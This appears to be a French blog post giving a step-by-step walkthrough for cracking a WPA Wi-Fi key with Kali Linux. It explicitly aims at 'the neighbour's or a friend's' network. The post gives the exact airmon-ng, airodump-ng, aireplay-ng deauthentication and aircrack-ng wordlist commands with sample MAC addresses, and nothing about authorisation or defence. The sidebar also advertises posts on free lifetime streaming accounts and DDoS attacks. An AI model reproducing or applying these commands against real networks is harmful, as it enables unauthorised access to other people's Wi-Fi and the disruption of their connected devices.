COMMENT HACKER UNE CLÉ WIFI WPA SOUS KALI LINUX ?

 

COMMENT HACKER UNE CLÉ WIFI WPA SOUS KALI LINUX 

 


INTRODUCTION !

Qui ne reve pas de cracker le wifi du voisin ou d'un(e) ami(e) ? Eh bien aujourdhui nous essaye de maniere tres paratique de prendre possession de la cle  wifi  d'un(e) ami(e) ici il ou elle seras consideré nommée : la cible Nous utiliserons une distribution UNIX nommee Kali Linux pour rappel c'est un Systeme d'exploitation qui peut être utilise pour différentes taches mais il est beaucoup plus reconnu pour hacker les réseauX informatique . Alors, je me porte volontaire pour vous montrer comment obtenir une la clé de sécurité d'un réseau WPA.Nous commençons par vérifier nos cartes réseaux avec la commande airmon-ng . Mais, avant tout, accède a votre ligne de commande Kali.




On observe une carte réseaux capable de supporter le mode moniteur alors pour activer ce mode nous allons utiliser la commande airmon-ng start suivis de l'interface de la carte réseaux et ici l'interface est wlan0 donc nous allons utiliser airmon-ng start wlan0.



Le mode moniteur a bien été active et le nom de notre interface moniteur est devenu mon0.

Pour trouver le wifi a hacker mais aussi les infos nécessaire nous allons utiliser la commande airodump-ng suivi du nom de l'interface moniteur qui est mon0 donc la commande entière seras airodump-ng mon0.

On observe en rouge le réseau qui utilise du WPA qui est de chaine 10. La chaine est très importante il faut toujours la note de cote. Ensuite une autre information a note est le BSSID. Pour le BSSID vous pouvez procéder come suit:

La prochaine étape sera de taper la commande suivante airodump-ng -c [channel] --bssid [bssid] -w /root/Desktop/ [monitor interface] où vous allez change channel par la chaine noté aussi bssid par celle qui a été copie et de meme pour monitor interface ce qui donneras dans mon cas airodump-ng -c 10 --bssid 00:14:BF:E0:E8:D5 -w /root/Desktop/ mon0.

Cette commande nous permet de capturer plus d'informations spécifique. Ici ce que nous faisons précisément c'est d'attendre qu'un utilisateur se connecte ou se reconnecte au réseau pour forcer le routeur a envoyer le handshake dons on a besoin pour hacker le wifi.

Apres sa veillez ouvrir un autre terminale dans lequel vous allez taper cette commande la aireplay-ng –0 2 –a [router bssid] –c [client bssid] mon0 dans mon cas sa vas donner aireplay-ng –0 2 –a 00:14:BF:E0:E8:D5 –c 4C:EB:42:59:DE:31 mon0.


Apres avoir fait sa verifier sur le premier terminal normalement un message comme celui ci doit s'afficher:

Pour terminer vous n'avez qu'a entrer la dernière commande et attendre le résultat. Cette commande qui est: aircrack-ng –a2 –b 00:14:BF:E0:E8:D5 –w /root/wpa.txt /root/Desktop/*.cap

FIN.HACKING


Commentaires

Posts les plus consultés de ce blog

COMMENT AVOIR UN COMPTE CRUNCHYROLL A VIE ?

Les classes d’adresses IP & Masques sous réseaux [ 1er Partie ]

Comment Faire une attaque DDOS via Termux ?